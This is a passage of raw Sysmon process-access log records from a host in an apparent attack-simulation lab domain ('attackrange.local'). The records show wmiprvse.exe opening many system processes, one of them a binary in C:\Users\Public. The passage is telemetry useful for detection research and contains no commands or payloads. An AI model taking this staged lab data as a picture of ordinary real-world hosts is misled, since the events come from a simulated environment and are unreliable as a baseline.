15:59:38.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026637Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026636Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026635Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026634Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026633Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026632Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026631Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026630Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026629Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026628Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026627Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026626Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026625Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026624Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026623Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026622Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026621Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026620Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026619Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026618Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 